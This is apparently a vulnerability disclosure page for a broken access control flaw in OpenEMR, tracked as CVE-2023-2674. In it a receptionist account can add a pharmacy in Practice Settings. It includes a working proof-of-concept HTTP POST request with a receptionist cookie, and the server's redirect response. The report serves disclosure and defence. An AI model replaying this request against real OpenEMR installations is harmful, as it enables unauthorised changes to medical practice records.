Lucene search
Nhienit2010AF73E913-730C-4245-88CE-26FC908D3644HistoryDec 26, 2022 - 9:07 a.m.
Broken Access Controls in Pratice settings
2022-12-2609:07:33
nhienit2010
www.huntr.dev
13
broken access controls
receptionist users
pharmacy addition
EPSS
0.004
Percentile
73.7%
Description
We observed that a receptionist user can add a Pharmacy in the Pratice Settings section, although this area is restricted to receptionist users.
Proof of Concept
REQUEST:
POST /openemr/controller.php?practice_settings&pharmacy&action=edit HTTP/1.1
Host: demo.openemr.io
Cookie: OpenEMR=<receptionist user's cookie>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Origin: https://demo.openemr.io
Referer: https://demo.openemr.io/openemr/controller.php?practice_settings&pharmacy&action=edit
form_id=&name=test_pharmarcy&address_line1=11&address_line2=11&city=&state=&zip=&email=&phone=&fax=&npi=&ncpdp=&transmit_method=1&id=&process=true
RESPONSE:
HTTP/1.1 302 Found
Server: nginx/1.21.1
Date: Mon, 26 Dec 2022 09:02:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/8.0.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /openemr/controller.php?practice_settings&pharmacy&action=list
Content-Length: 9246
<!DOCTYPE html>
<html>
<head>
<title>Practice Settings</title>
<meta charset="utf-8" />
...
PoC Image
After we send the request above
there is a new pharmacy added
Related
prion
prion
Improper access control
2023-05-12 08:15:00
nvd
nvd
CVE-2023-2674
2023-05-12 08:15:09
cnvd
cnvd
OpenEMR Access Control Error Vulnerability (CNVD-2023-40910)
2023-05-17 00:00:00
cve
cve
CVE-2023-2674
2023-05-12 08:15:09
osv
osv
CVE-2023-2674
2023-05-12 08:15:09
cvelist
cvelist
CVE-2023-2674 Improper Access Control in openemr/openemr
2023-05-12 00:00:00
openvas
openvas
OpenEMR < 7.0.1 Multiple Vulnerabilities
2023-05-10 00:00:00